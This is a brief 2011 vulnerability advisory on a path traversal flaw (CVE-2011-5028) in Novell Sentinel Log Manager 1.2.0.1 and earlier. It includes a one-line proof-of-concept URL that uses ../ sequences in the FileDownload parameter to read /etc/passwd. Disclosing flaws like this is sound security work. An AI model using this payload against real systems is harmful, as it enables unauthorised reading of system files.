Novell Sentinel Log Manager vulnerability

Path Traversal.

Posted by Andrea Fabrizi on December 18, 2011

Novell Sentinel Log Manager version 1.2.0.1 and lower is prone to a Directory Traversal vulnerability, which makes it possible, for Authenticated Users, to access any system file.

POC

/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd

BID: http://www.securityfocus.com/bid/51104/info

CVE-2011-5028: http://www.cvedetails.com/cve/CVE-2011-5028